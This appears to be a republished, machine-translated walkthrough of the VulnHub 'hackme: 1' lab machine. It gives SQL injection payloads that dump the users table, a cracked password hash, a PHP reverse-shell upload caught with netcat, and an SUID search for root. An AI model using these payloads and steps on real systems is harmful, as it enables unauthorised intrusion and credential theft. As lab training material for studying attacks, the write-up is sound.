当前位置:网站首页>vulnhub hackme: 1
vulnhub hackme: 1
2022-07-06 08:11:00 【Fairy elephant】
Infiltrate ideas :
nmap scanning ----->dirb and nikto scanning -----> utilize SQL Obtained by joint injection superadmin Account and password -----> Get rebound through file upload vulnerability shell-----> Through the strange directory suid File authorization of permission
environmental information :
Drone aircraft :192.168.101.45
attack :192.168.101.34
Specific steps :
step 1、nmap scanning
sudo nmap -sS -A -p- 192.168.101.45
nmap Conduct TCP Full port scanning , Scan only 22(ssh) and 80(http) Port open
step 2、dirb and nikto scanning
dirb scanning
dirb http://192.168.101.45
Sweep to http://192.168.101.45/uploads/
After visiting with the browser, I found it was a directory , Only one file ,test.png
There is nothing in the picture , Use after downloading strings Command view also has no readable string .
nikto scanning
nikto -host 192.168.101.45
I didn't find anything useful
step 3、 utilize SQL Obtained by joint injection superadmin Account and password
Browser access http://192.168.101.45, Found a login page , At present, there is no prompt information about account and password , Trying universal password failed .
But I found one Sign up now link , You can register an account
After you register your account, click Login here, Go back to the login page to login , After logging in successfully, I found a page that can search book information by book name .
Click directly without entering the book name search Button can get all the book information .
According to the beginning nmap The results of the scan ,web Server is apache, According to the documents in the website .php, It can be inferred that the database rate here is mysql.
See if there is sql Inject :
Then enter in the search box
CISSP
Get a result
Input
CISSP' or 1=1#
Get all the book information
Obviously, it's the ' or 1=1# As sql Part of the statement to execute .
Let's try union Inject :
First try order by, result n No matter what number you enter, there is no result
CISSP' order by n#
No problem , Go straight up union select Well , What is visible to the naked eye here is 3 That's ok , So try it first
CISSP' union select 1,2,3#
It is found that the output is indeed 3 Column , also 3 Columns are visible
Next, enter the following payload
CISSP' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
CISSP' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()#
CISSP' union select 1,group_concat(user),group_concat(pasword) from users#
First, you can get the names of all tables in the current database , It includes users surface
Second, you can get the table users All column names , It includes user and pasword
Third, we can get users Tabular user and pasword All values for column
Notice that one of the users superadmin, Put the corresponding password (2386acb2cf356944177746fc92523983) Get online md5 Decrypt it , obtain Uncrackable
step 4、 Get rebound through file upload vulnerability shell
Log out of the current user , Enter the user name on the login page superadmin And password Uncrackable, Successfully logged in , And the page is different from that of the user registered in the previous step , Is a page for uploading files .
Try to upload the file php-reverse.php, This file is kali linux Upper /usr/share/webshells/php/php-reverse-shell.php Revised $ip and $port After the value of .
After uploading, you will be prompted that the file has been uploaded successfully , And kept it in uploads Under the folder
visit http://192.168.101.45/uploads/ Find out php-reverse.php Indeed, it has been uploaded successfully
Attack aircraft nc monitor 443 port
nc -nlvp 443
Browser access http://192.168.101.45/uploads/php-reverse.php
obtain www-data Rebound of shell
Enter the following command to get interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
step 5、 Through the strange directory suid File authorization of permission
A little bit lucky , stay /home Look under the directory , I found it /home/legacy/touchmenot, This document has suid jurisdiction , After running, you can get root Yes .
In fact, it is more formulaic ,suid The file with permission can be found with the following command
find / -perm -u=s -type f 2>/dev/null
边栏推荐
- [untitled]
- Introduction to backup and recovery Cr
- 从 TiDB 集群迁移数据至另一 TiDB 集群
- 备份与恢复 CR 介绍
- [Yugong series] creation of 009 unity object of U3D full stack class in February 2022
- Résumé des diagrammes de description des broches de la série ESP
- Step by step guide to setting NFT as an ens profile Avatar
- 升级 TiDB Operator
- 【云原生】手把手教你搭建ferry开源工单系统
- [redis] Introduction to NoSQL database and redis
猜你喜欢
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Go learning notes (3) basic types and statements (2)
Convolution, pooling, activation function, initialization, normalization, regularization, learning rate - Summary of deep learning foundation
All the ArrayList knowledge you want to know is here
matplotlib. Widgets are easy to use
ESP series pin description diagram summary
NFT smart contract release, blind box, public offering technology practice -- contract
hcip--mpls
22. Empty the table
IP lab, the first weekly recheck
随机推荐
From monomer structure to microservice architecture, introduction to microservices
面向个性化需求的在线云数据库混合调优系统 | SIGMOD 2022入选论文解读
ROS learning (IX): referencing custom message types in header files
Use dumping to back up tidb cluster data to S3 compatible storage
It's hard to find a job when the industry is in recession
Hill sort c language
[untitled]
2.10transfrom attribute
"Friendship and righteousness" of the center for national economy and information technology: China's friendship wine - the "unparalleled loyalty and righteousness" of the solidarity group released th
shu mei pai
[research materials] 2021 China online high growth white paper - Download attached
Introduction to number theory (greatest common divisor, prime sieve, inverse element)
Image fusion -- challenges, opportunities and Countermeasures
Understanding of law of large numbers and central limit theorem
Data governance: Data Governance under microservice architecture
Artcube information of "designer universe": Guangzhou implements the community designer system to achieve "great improvement" of urban quality | national economic and Information Center
Analysis of pointer and array written test questions
Hackathon ifm
华为云OBS文件上传下载工具类
"Designer universe" APEC design +: the list of winners of the Paris Design Award in France was recently announced. The winners of "Changsha world center Damei mansion" were awarded by the national eco